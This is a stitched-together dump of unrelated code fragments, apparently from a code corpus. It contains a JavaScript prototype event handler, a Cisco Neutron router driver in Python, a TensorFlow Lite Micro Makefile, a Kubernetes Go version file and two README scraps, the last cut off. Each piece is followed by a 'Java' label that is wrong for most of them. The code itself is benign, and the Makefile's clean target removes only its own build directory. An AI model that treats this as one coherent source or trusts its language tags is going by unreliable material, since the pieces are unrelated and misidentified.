"#80B8F1", "text-align": "center", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": { "attributes": { "vertical-align": "middle", "text-align": "center" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": { "attributes": { 
"color": "#007DFF", "text-align": "center", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } }) .on("pageload", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .pageload", function(event, data) { var jEvent, jFirer, cases; if(data === undefined) { data = event; } jEvent = jimEvent(event); jFirer = jEvent.getEventFirer(); if(jFirer.is("#s-Label_35")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimSetValue", "parameter": { "target": "#s-Label_35", "value": { "action": "jimConcat", "parameter": [ { "action": "jimSubstring", "parameter": [ { "action": "jimSystemTime" },"0","5" ] }," PM" ] } }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } });
Java
# Copyright 2015 Cisco Systems, Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from oslo_log import log as logging from oslo_utils import uuidutils from sqlalchemy.orm import exc from sqlalchemy.sql import expression as expr from neutron.db import models_v2 from neutron.extensions import l3 from neutron_lib import constants as l3_constants from neutron_lib import exceptions as n_exc from networking_cisco._i18n import _, _LW from networking_cisco import backwards_compatibility as bc from networking_cisco.plugins.cisco.common import cisco_constants from networking_cisco.plugins.cisco.db.l3 import ha_db from networking_cisco.plugins.cisco.db.l3 import l3_models from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import ( L3RouterApplianceDBMixin) from networking_cisco.plugins.cisco.extensions import routerhostingdevice from networking_cisco.plugins.cisco.extensions import routerrole from networking_cisco.plugins.cisco.extensions import routertype from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler from networking_cisco.plugins.cisco.l3 import drivers LOG = logging.getLogger(__name__) DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL ROUTER_ROLE_HA_REDUNDANCY = 
cisco_constants.ROUTER_ROLE_HA_REDUNDANCY TENANT_HSRP_GRP_RANGE = 1 TENANT_HSRP_GRP_OFFSET = 1064 EXT_HSRP_GRP_RANGE = 1 EXT_HSRP_GRP_OFFSET = 1064 N_ROUTER_PREFIX = 'nrouter-' DEV_NAME_LEN = 14 class TopologyNotSupportedByRouterError(n_exc.Conflict): message = _("Requested topology cannot be supported by router.") class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver): def create_router_precommit(self, context, router_context): pass def create_router_postcommit(self, context, router_context): pass def update_router_precommit(self, context, router_context): pass def update_router_postcommit(self, context, router_context): # Whenever a gateway is added to, or removed from, a router hosted on # a hosting device, we must ensure that a global router is running # (for add operation) or not running (for remove operation) on that # hosting device. current = router_context.current if current[HOSTING_DEVICE_ATTR] is None: return e_context = context.elevated() if current['gw_port_id']: self._conditionally_add_global_router(e_context, current) else: self._conditionally_remove_global_router( e_context, router_context.original, True) def delete_router_precommit(self, context, router_context): pass def delete_router_postcommit(self, context, router_context): pass def schedule_router_precommit(self, context, router_context): pass def schedule_router_postcommit(self, context, router_context): # When the hosting device hosts a Neutron router with external # connectivity, a "global" router (modeled as a Neutron router) must # also run on the hosting device (outside of any VRF) to enable the # connectivity. 
current = router_context.current if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None: self._conditionally_add_global_router(context.elevated(), current) def unschedule_router_precommit(self, context, router_context): pass def unschedule_router_postcommit(self, context, router_context): # When there is no longer any router with external gateway hosted on # a hosting device, the global router on that hosting device can also # be removed. current = router_context.current hd_id = current[HOSTING_DEVICE_ATTR] if current['gw_port_id'] and hd_id is not None: self._conditionally_remove_global_router(context.elevated(), current) def add_router_interface_precommit(self, context, r_port_context): # Inside an ASR1k, VLAN sub-interfaces are used to connect to internal # neutron networks. Only one such sub-interface can be created for each # VLAN. As the VLAN sub-interface is added to the VRF representing the # Neutron router, we must only allow one Neutron router to attach to a # particular Neutron subnet/network. if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR] == ROUTER_ROLE_HA_REDUNDANCY): # redundancy routers can be exempt as we check the user visible # routers and the request will be rejected there. 
return e_context = context.elevated() if r_port_context.current is None: sn = self._core_plugin.get_subnet(e_context, r_port_context.current_subnet_id) net_id = sn['network_id'] else: net_id = r_port_context.current['network_id'] filters = {'network_id': [net_id], 'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]} for port in self._core_plugin.get_ports(e_context, filters=filters): router_id = port['device_id'] if router_id is None: continue router = self._l3_plugin.get_router(e_context, router_id) if router[routerrole.ROUTER_ROLE_ATTR] is None: raise TopologyNotSupportedByRouterError() def add_router_interface_postcommit(self, context, r_port_context): pass def remove_router_interface_precommit(self, context, r_port_context): pass def remove_router_interface_postcommit(self, context, r_port_context): pass def create_floatingip_precommit(self, context, fip_context): pass def create_floatingip_postcommit(self, context, fip_context): pass def update_floatingip_precommit(self, context, fip_context): pass def update_floatingip_postcommit(self, context, fip_context): pass def delete_floatingip_precommit(self, context, fip_context): pass def delete_floatingip_postcommit(self, context, fip_context): pass def ha_interface_ip_address_needed(self, context, router, port, ha_settings_db, ha_group_uuid): if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW: return False else: return True def generate_ha_group_id(self, context, router, port, ha_settings_db, ha_group_uuid): if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW, DEVICE_OWNER_GLOBAL_ROUTER_GW}: ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN] group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE group_id += TENANT_HSRP_GRP_OFFSET return group_id else: net_id_digits = port['network_id'][:6] group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE group_id += EXT_HSRP_GRP_OFFSET return group_id def pre_backlog_processing(self, context): filters = {routerrole.ROUTER_ROLE_ATTR: 
[ROUTER_ROLE_GLOBAL]} global_routers = self._l3_plugin.get_routers(context, filters=filters) if not global_routers: LOG.debug("There are no global routers") return for gr in global_routers: filters = { HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None] } invert_filters = {'gw_port_id': [None]} num_rtrs = self._l3_plugin.get_routers_count_extended( context, filters=filters, invert_filters=invert_filters) LOG.debug("Global router %(name)s[%(id)s] with hosting_device " "%(hd)s has %(num)d routers with gw_port set on that " "device", {'name': gr['name'], 'id': gr['id'], 'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, }) if num_rtrs == 0: LOG.warning( _LW("Global router:%(name)s[id:%(id)s] is present for " "hosting device:%(hd)s but there are no tenant or " "redundancy routers with gateway set on that hosting " "device. Proceeding to delete global router."), {'name': gr['name'], 'id': gr['id'], 'hd': gr[HOSTING_DEVICE_ATTR]}) self._delete_global_router(context, gr['id']) filters = { #TODO(bmelande): Filter on routertype of global router #routertype.TYPE_ATTR: [routertype_id], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} log_global_routers = self._l3_plugin.get_routers( context, filters=filters) if log_global_routers: log_global_router_id = log_global_routers[0]['id'] self._delete_global_router(context, log_global_router_id, logical=True) def post_backlog_processing(self, context): pass # ---------------- Create workflow functions ----------------- def _conditionally_add_global_router(self, context, tenant_router): # We could filter on hosting device id but we don't so we get all # global routers for this router type. We can then use that count to # determine which ha priority a new global router should get. 
filters = { routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]} global_routers = self._l3_plugin.get_routers( context, filters=filters) hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers} hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR] ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id'] global_router = hd_to_gr_dict.get(hosting_device_id) logical_global_router = self._get_logical_global_router(context, tenant_router) self._conditionally_add_auxiliary_external_gateway_port( context, logical_global_router, ext_nw_id, tenant_router, True) if global_router is None: # must create global router on hosting device global_router = self._create_global_router( context, hosting_device_id, hd_to_gr_dict, tenant_router, logical_global_router) self._conditionally_add_auxiliary_external_gateway_port( context, global_router, ext_nw_id, tenant_router) self._l3_plugin.add_type_and_hosting_device_info(context, global_router) for ni in self._l3_plugin.get_notifiers(context, [global_router]): if ni['notifier']: ni['notifier'].routers_updated(context, ni['routers']) def _conditionally_add_auxiliary_external_gateway_port( self, context, global_router, ext_net_id, tenant_router, provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): # tbe global router may or may not have an interface on the # external network that the tenant router uses filters = { 'device_id': [global_router['id']], 'device_owner': [port_type]} connected_nets = { p['network_id']: p['fixed_ips'] for p in self._core_plugin.get_ports(context, filters=filters)} if ext_net_id in connected_nets: # already connected to the external network so we're done return else: # not connected to the external network, so let's fix that aux_gw_port = self._create_auxiliary_external_gateway_port( context, global_router, ext_net_id, tenant_router, port_type) if provision_ha: self._provision_port_ha(context, aux_gw_port, global_router) def 
_create_auxiliary_external_gateway_port( self, context, global_router, ext_net_id, tenant_router, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): # When a global router is connected to an external network then a # special type of gateway port is created on that network. Such a # port is called auxiliary gateway ports. It has an ip address on # each subnet of the external network. A (logical) global router # never has a traditional Neutron gateway port. filters = { 'device_id': [tenant_router['id']], 'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]} # fetch the gateway port of the *tenant* router so we can determine # the CIDR of that port's subnet gw_port = self._core_plugin.get_ports(context, filters=filters)[0] fixed_ips = self._get_fixed_ips_subnets(context, gw_port) global_router_id = global_router['id'] with context.session.begin(subtransactions=True): aux_gw_port = self._core_plugin.create_port(context, { 'port': { 'tenant_id': '', # intentionally not set 'network_id': ext_net_id, 'mac_address': bc.constants.ATTR_NOT_SPECIFIED, 'fixed_ips': fixed_ips, 'device_id': global_router_id, 'device_owner': port_type, 'admin_state_up': True, 'name': ''}}) router_port = bc.RouterPort( port_id=aux_gw_port['id'], router_id=global_router_id, port_type=port_type) context.session.add(router_port) return aux_gw_port def _create_global_router( self, context, hosting_device_id, hd_to_gr_dict, tenant_router, logical_global_router): r_spec = {'router': { # global routers are not tied to any tenant 'tenant_id': '', 'name': self._global_router_name(hosting_device_id), 'admin_state_up': True}} global_router, r_hd_b_db = self._l3_plugin.do_create_router( context, r_spec, tenant_router[routertype.TYPE_ATTR], False, True, hosting_device_id, ROUTER_ROLE_GLOBAL) # make the global router a redundancy router for the logical # global router (which we treat as a hidden "user visible # router" (how's that for a contradiction of terms! 
:-) ) with context.session.begin(subtransactions=True): ha_priority = ( ha_db.DEFAULT_MASTER_PRIORITY - len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP) r_b_b = ha_db.RouterRedundancyBinding( redundancy_router_id=global_router['id'], priority=ha_priority, user_router_id=logical_global_router['id']) context.session.add(r_b_b) return global_router def _get_logical_global_router(self, context, tenant_router): # Since HA is also enabled on the global routers on each hosting device # those global routers need HA settings and VIPs. We represent that # using a Neutron router that is never instantiated/hosted. That # Neutron router is referred to as the "logical global" router. filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} logical_global_routers = self._l3_plugin.get_routers( context, filters=filters) if not logical_global_routers: # must create logical global router logical_global_router = self._create_logical_global_router( context, tenant_router) else: logical_global_router = logical_global_routers[0] self._update_ha_redundancy_level(context, logical_global_router, 1) return logical_global_router def _create_logical_global_router(self, context, tenant_router): r_spec = {'router': { # global routers are not tied to any tenant 'tenant_id': '', 'name': self._global_router_name('', logical=True), 'admin_state_up': True, # set auto-schedule to false to keep this router un-hosted routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}} # notifications should never be sent for this logical router! 
logical_global_router, r_hd_b_db = ( self._l3_plugin.do_create_router( context, r_spec, tenant_router[routertype.TYPE_ATTR], False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL)) with context.session.begin(subtransactions=True): r_ha_s_db = ha_db.RouterHASetting( router_id=logical_global_router['id'], ha_type=cfg.CONF.ha.default_ha_mechanism, redundancy_level=1, priority=ha_db.DEFAULT_MASTER_PRIORITY, probe_connectivity=False, probe_target=None, probe_interval=None) context.session.add(r_ha_s_db) return logical_global_router def _get_fixed_ips_subnets(self, context, gw_port): nw = self._core_plugin.get_network(context, gw_port['network_id']) subnets = [{'subnet_id': s} for s in nw['subnets']] return subnets def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None): ha_group_uuid = uuidutils.generate_uuid() router_id = router['id'] with context.session.begin(subtransactions=True): if ha_binding_db is None: ha_binding_db = self._get_ha_binding(context, router_id) group_id = self.generate_ha_group_id( context, router, {'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db, ha_group_uuid) r_ha_g = ha_db.RouterHAGroup( id=ha_group_uuid, tenant_id='', ha_type=ha_binding_db.ha_type, group_identity=group_id, ha_port_id=ha_port['id'], extra_port_id=None, subnet_id=ha_port['fixed_ips'][0]['subnet_id'], user_router_id=router_id, timers_config='', tracking_config='', other_config='') context.session.add(r_ha_g) def _get_ha_binding(self, context, router_id): with context.session.begin(subtransactions=True): query = context.session.query(ha_db.RouterHASetting) query = query.filter( ha_db.RouterHASetting.router_id == router_id) return query.first() # ---------------- Remove workflow functions ----------------- def _conditionally_remove_global_router(self, context, tenant_router, update_operation=False): filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL], HOSTING_DEVICE_ATTR: 
[tenant_router[HOSTING_DEVICE_ATTR]]} global_routers = self._l3_plugin.get_routers(context, filters=filters) hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers} if global_routers: global_router_id = global_routers[0]['id'] if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]: # let l3 plugin's periodic backlog processing take care of the # clean up of the global router return ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id'] routertype_id = tenant_router[routertype.TYPE_ATTR] hd_id = tenant_router[HOSTING_DEVICE_ATTR] global_router = hd_to_gr_dict.get(hd_id) port_deleted = self._conditionally_remove_auxiliary_gateway_port( context, global_router_id, ext_net_id, routertype_id, hd_id, update_operation) if port_deleted is False: # since no auxiliary gateway port was deleted we can # abort no since auxiliary gateway port count cannot # have reached zero return filters = { 'device_id': [global_router_id], 'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]} num_aux_gw_ports = self._core_plugin.get_ports_count( context, filters=filters) if num_aux_gw_ports == 0: # global router not needed any more so we delete it self._delete_global_router(context, global_router_id) do_notify = False else: do_notify = True # process logical global router to remove its port self._conditionally_remove_auxiliary_gateway_vip_port( context, ext_net_id, routertype_id) self._l3_plugin.add_type_and_hosting_device_info(context, global_router) if do_notify is True: for ni in self._l3_plugin.get_notifiers(context, [global_router]): if ni['notifier']: ni['notifier'].routers_updated(context, ni['routers']) def _conditionally_remove_auxiliary_gateway_port( self, context, router_id, ext_net_id, routertype_id, hosting_device_id, update_operation=False): num_rtrs = self._get_gateway_routers_count( context, ext_net_id, routertype_id, None, hosting_device_id) if ((num_rtrs <= 1 and update_operation is False) or (num_rtrs == 0 and update_operation is True)): # there are no 
tenant routers *on ext_net_id* that are serviced by # this global router so it's aux gw port can be deleted self._delete_auxiliary_gateway_ports(context, router_id, ext_net_id) return True return False def _conditionally_remove_auxiliary_gateway_vip_port( self, context, ext_net_id, routertype_id): filters = {routertype.TYPE_ATTR: [routertype_id], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} log_global_routers = self._l3_plugin.get_routers(context, filters=filters) if not log_global_routers: return self._update_ha_redundancy_level(context, log_global_routers[0], -1) log_global_router_id = log_global_routers[0]['id'] num_global_rtrs = self._get_gateway_routers_count( context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL) if num_global_rtrs == 0: # there are no global routers *on ext_net_id* that are serviced by # this logical global router so it's aux gw VIP port can be deleted self._delete_auxiliary_gateway_ports(context, log_global_router_id, ext_net_id) filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL] total_num_global_rtrs = self._l3_plugin.get_routers_count( context, filters=filters) if total_num_global_rtrs == 0: # there are no global routers left that are serviced by this # logical global router so it can be deleted self._delete_global_router(context, log_global_router_id, True) return False def _delete_auxiliary_gateway_ports( self, context, router_id, net_id=None, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): filters = { 'device_id': [router_id], 'device_owner': [port_type]} if net_id is not None: filters['network_id'] = [net_id] for port in self._core_plugin.get_ports(context, filters=filters): try: self._core_plugin.delete_port(context, port['id'], l3_port_check=False) except (exc.ObjectDeletedError, n_exc.PortNotFound) as e: LOG.warning(e) def _delete_global_router(self, context, global_router_id, logical=False): # ensure we clean up any stale auxiliary gateway ports self._delete_auxiliary_gateway_ports(context, global_router_id) try: 
if logical is True: # We use parent class method as no special operations beyond # what the base implemenation does are needed for logical # global router super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router( context, global_router_id) else: self._l3_plugin.delete_router( context, global_router_id, unschedule=False) except (exc.ObjectDeletedError, l3.RouterNotFound) as e: LOG.warning(e) def _get_gateway_routers_count(self, context, ext_net_id, routertype_id, router_role, hosting_device_id=None): # Determine number of routers (with routertype_id and router_role) # that act as gateway to ext_net_id and that are hosted on # hosting_device_id (if specified). query = context.session.query(bc.Router) if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]: # tenant router roles query = query.join(models_v2.Port, models_v2.Port.id == bc.Router.gw_port_id) role_filter = expr.or_( l3_models.RouterHostingDeviceBinding.role == expr.null(), l3_models.RouterHostingDeviceBinding.role == ROUTER_ROLE_HA_REDUNDANCY) else: # global and logical global routers query = query.join(models_v2.Port, models_v2.Port.device_owner == bc.Router.id) role_filter = ( l3_models.RouterHostingDeviceBinding.role == router_role) query = query.join( l3_models.RouterHostingDeviceBinding, l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id) query = query.filter( role_filter, models_v2.Port.network_id == ext_net_id, l3_models.RouterHostingDeviceBinding.router_type_id == routertype_id) if hosting_device_id is not None: query = query.filter( l3_models.RouterHostingDeviceBinding.hosting_device_id == hosting_device_id) return query.count() # ---------------- General support functions ----------------- def _update_ha_redundancy_level(self, context, logical_global_router, delta): with context.session.begin(subtransactions=True): log_g_router_db = self._l3_plugin._get_router( context, logical_global_router['id']) log_g_router_db.ha_settings.redundancy_level += delta 
context.session.add(log_g_router_db.ha_settings) def _router_name(self, router_id): return N_ROUTER_PREFIX + router_id def _global_router_name(self, hosting_device_id, logical=False): if logical is True: return cisco_constants.LOGICAL_ROUTER_ROLE_NAME else: return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX, hosting_device_id[-cisco_constants.ROLE_ID_LEN:]) @property def _core_plugin(self): return bc.get_plugin() @property def _l3_plugin(self): return bc.get_plugin(bc.constants.L3)
Java
MAKEFILE_DIR := tensorflow/lite/experimental/micro/tools/make # Pull in some convenience functions. include $(MAKEFILE_DIR)/helper_functions.inc # Try to figure out the host system HOST_OS := ifeq ($(OS),Windows_NT) HOST_OS = windows else UNAME_S := $(shell uname -s) ifeq ($(UNAME_S),Linux) HOST_OS := linux endif ifeq ($(UNAME_S),Darwin) HOST_OS := osx endif endif HOST_ARCH := $(shell if [[ $(shell uname -m) =~ i[345678]86 ]]; then echo x86_32; else echo $(shell uname -m); fi) # Override these on the make command line to target a specific architecture. For example: # make -f tensorflow/lite/Makefile TARGET=rpi TARGET_ARCH=armv7l TARGET := $(HOST_OS) TARGET_ARCH := $(HOST_ARCH) # Specify TAGS on the command line to add a particular set of specialized # implementations, for example TAGS="CMSIS disco_f746ng" to target a Discovery # STM32F746NG board, using the CMSIS library's implementations where possible. ALL_TAGS := $(TAGS) $(TARGET) INCLUDES := \ -I. \ -I$(MAKEFILE_DIR)/../../../../../ \ -I$(MAKEFILE_DIR)/../../../../../../ \ -I$(MAKEFILE_DIR)/../../../../../../../ \ -I$(MAKEFILE_DIR)/downloads/ \ -I$(MAKEFILE_DIR)/downloads/gemmlowp \ -I$(MAKEFILE_DIR)/downloads/flatbuffers/include \ -I$(OBJDIR) # This is at the end so any globally-installed frameworks like protobuf don't # override local versions in the source tree. INCLUDES += -I/usr/local/include TEST_SCRIPT := tensorflow/lite/experimental/micro/testing/test_linux_binary.sh MICROLITE_LIBS := -lm # There are no rules for compiling objects for the host system (since we don't # generate things like the protobuf compiler that require that), so all of # these settings are for the target compiler. CXXFLAGS := -O3 -DNDEBUG CXXFLAGS += --std=c++11 -g -DTF_LITE_STATIC_MEMORY CCFLAGS := -DNDEBUG -g -DTF_LITE_STATIC_MEMORY LDOPTS := -L/usr/local/lib ARFLAGS := -r TARGET_TOOLCHAIN_PREFIX := CC_PREFIX := # This library is the main target for this makefile. 
It will contain a minimal # runtime that can be linked in to other programs. MICROLITE_LIB_NAME := libtensorflow-microlite.a MICROLITE_TEST_SRCS := \ $(wildcard tensorflow/lite/experimental/micro/*test.cc) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*test.cc) MICROLITE_TEST_HDRS := \ $(wildcard tensorflow/lite/experimental/micro/testing/*.h) MICROLITE_CC_BASE_SRCS := \ $(wildcard tensorflow/lite/experimental/micro/*.cc) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*.cc) \ tensorflow/lite/c/c_api_internal.c \ tensorflow/lite/core/api/error_reporter.cc \ tensorflow/lite/core/api/flatbuffer_conversions.cc \ tensorflow/lite/core/api/op_resolver.cc \ tensorflow/lite/kernels/kernel_util.cc \ tensorflow/lite/kernels/internal/quantization_util.cc MICROLITE_CC_SRCS := $(filter-out $(MICROLITE_TEST_SRCS), $(MICROLITE_CC_BASE_SRCS)) MICROLITE_CC_SRCS := $(call specialize,$(MICROLITE_CC_SRCS)) MICROLITE_CC_HDRS := \ $(wildcard tensorflow/lite/experimental/micro/*.h) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*.h) \ LICENSE \ tensorflow/lite/c/c_api_internal.h \ tensorflow/lite/c/builtin_op_data.h \ tensorflow/lite/core/api/error_reporter.h \ tensorflow/lite/core/api/flatbuffer_conversions.h \ tensorflow/lite/core/api/op_resolver.h \ tensorflow/lite/kernels/kernel_util.h \ tensorflow/lite/kernels/op_macros.h \ tensorflow/lite/kernels/padding.h \ tensorflow/lite/kernels/internal/common.h \ tensorflow/lite/kernels/internal/compatibility.h \ tensorflow/lite/kernels/internal/reference/depthwiseconv_float.h \ tensorflow/lite/kernels/internal/reference/depthwiseconv_uint8.h \ tensorflow/lite/kernels/internal/reference/fully_connected.h \ tensorflow/lite/kernels/internal/reference/softmax.h \ tensorflow/lite/kernels/internal/round.h \ tensorflow/lite/kernels/internal/tensor_ctypes.h \ tensorflow/lite/kernels/internal/types.h \ tensorflow/lite/kernels/internal/quantization_util.h \ tensorflow/lite/schema/schema_generated.h \ tensorflow/lite/version.h 
THIRD_PARTY_CC_HDRS := \ third_party/gemmlowp/fixedpoint/fixedpoint.h \ third_party/gemmlowp/fixedpoint/fixedpoint_sse.h \ third_party/gemmlowp/internal/detect_platform.h \ third_party/gemmlowp/LICENSE \ third_party/flatbuffers/include/flatbuffers/base.h \ third_party/flatbuffers/include/flatbuffers/stl_emulation.h \ third_party/flatbuffers/include/flatbuffers/flatbuffers.h \ third_party/flatbuffers/LICENSE.txt MAKE_PROJECT_FILES := \ README_MAKE.md \ Makefile MBED_PROJECT_FILES := \ README_MBED.md \ mbed-os.lib \ mbed_app.json # These target-specific makefiles should modify or replace options like # CXXFLAGS or LIBS to work for a specific targetted architecture. All logic # based on platforms or architectures should happen within these files, to # keep this main makefile focused on the sources and dependencies. include $(wildcard $(MAKEFILE_DIR)/targets/*_makefile.inc) ALL_TAGS += $(TARGET_ARCH) ALL_SRCS := \ $(MICROLITE_CC_SRCS) \ $(MICROLITE_TEST_SRCS) # Where compiled objects are stored. GENDIR := $(MAKEFILE_DIR)/gen/$(TARGET)_$(TARGET_ARCH)/ OBJDIR := $(GENDIR)obj/ BINDIR := $(GENDIR)bin/ LIBDIR := $(GENDIR)lib/ PRJDIR := $(GENDIR)prj/ MICROLITE_LIB_PATH := $(LIBDIR)$(MICROLITE_LIB_NAME) CXX := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}g++ CC := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}gcc AR := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}ar # Load the examples. include $(wildcard tensorflow/lite/experimental/micro/examples/*/Makefile.inc) MICROLITE_LIB_OBJS := $(addprefix $(OBJDIR), \ $(patsubst %.cc,%.o,$(patsubst %.c,%.o,$(MICROLITE_CC_SRCS)))) MICROLITE_TEST_TARGETS := $(addprefix $(BINDIR), \ $(patsubst %_test.cc,%.test_target,$(MICROLITE_TEST_SRCS))) # For normal manually-created TensorFlow C++ source files. $(OBJDIR)%.o: %.cc @mkdir -p $(dir $@) $(CXX) $(CXXFLAGS) $(INCLUDES) -c $< -o $@ # For normal manually-created TensorFlow C source files. 
$(OBJDIR)%.o: %.c @mkdir -p $(dir $@) $(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@ # For normal manually-created TensorFlow ASM source files. $(OBJDIR)%.o: %.S @mkdir -p $(dir $@) $(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@ # The target that's compiled if there's no command-line arguments. all: $(MICROLITE_LIB_PATH) microlite: $(MICROLITE_LIB_PATH) # Hack for generating schema file bypassing flatbuffer parsing tensorflow/lite/schema/schema_generated.h: @cp -u tensorflow/lite/schema/schema_generated.h.OPENSOURCE tensorflow/lite/schema/schema_generated.h # Gathers together all the objects we've compiled into a single '.a' archive. $(MICROLITE_LIB_PATH): tensorflow/lite/schema/schema_generated.h $(MICROLITE_LIB_OBJS) @mkdir -p $(dir $@) $(AR) $(ARFLAGS) $(MICROLITE_LIB_PATH) $(MICROLITE_LIB_OBJS) $(BINDIR)%_test : $(OBJDIR)%_test.o $(MICROLITE_LIB_PATH) @mkdir -p $(dir $@) $(CXX) $(CXXFLAGS) $(INCLUDES) \ -o $@ $< \ $(LIBFLAGS) $(MICROLITE_LIB_PATH) $(LDFLAGS) $(MICROLITE_LIBS) $(BINDIR)%.test_target: $(BINDIR)%_test $(TEST_SCRIPT) $< '~~~ALL TESTS PASSED~~~' # Generate standalone makefile projects for all of the test targets. $(foreach TEST_TARGET,$(MICROLITE_TEST_SRCS),\ $(eval $(call microlite_test,$(notdir $(basename $(TEST_TARGET))),$(TEST_TARGET)))) test: test_micro_speech $(MICROLITE_TEST_TARGETS) # Gets rid of all generated files. clean: rm -rf $(MAKEFILE_DIR)/gen $(DEPDIR)/%.d: ; .PRECIOUS: $(DEPDIR)/%.d .PRECIOUS: $(BINDIR)%_test -include $(patsubst %,$(DEPDIR)/%.d,$(basename $(ALL_SRCS)))
Java
# aitproject
Java
/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package version import ( "fmt" "os" "runtime" ) var ( // Version shows the version of kube batch. Version = "Not provided." // GitSHA shoows the git commit id of kube batch. GitSHA = "Not provided." // Built shows the built time of the binary. Built = "Not provided." ) // PrintVersionAndExit prints versions from the array returned by Info() and exit func PrintVersionAndExit(apiVersion string) { for _, i := range Info(apiVersion) { fmt.Printf("%v\n", i) } os.Exit(0) } // Info returns an array of various service versions func Info(apiVersion string) []string { return []string{ fmt.Sprintf("API Version: %s", apiVersion), fmt.Sprintf("Version: %s", Version), fmt.Sprintf("Git SHA: %s", GitSHA), fmt.Sprintf("Built At: %s", Built), fmt.Sprintf("Go Version: %s", runtime.Version()), fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH), } }
Java
# Display a scene

Display a scene with a terrain surface and some imagery.

![](screenshot.png)

## Use case

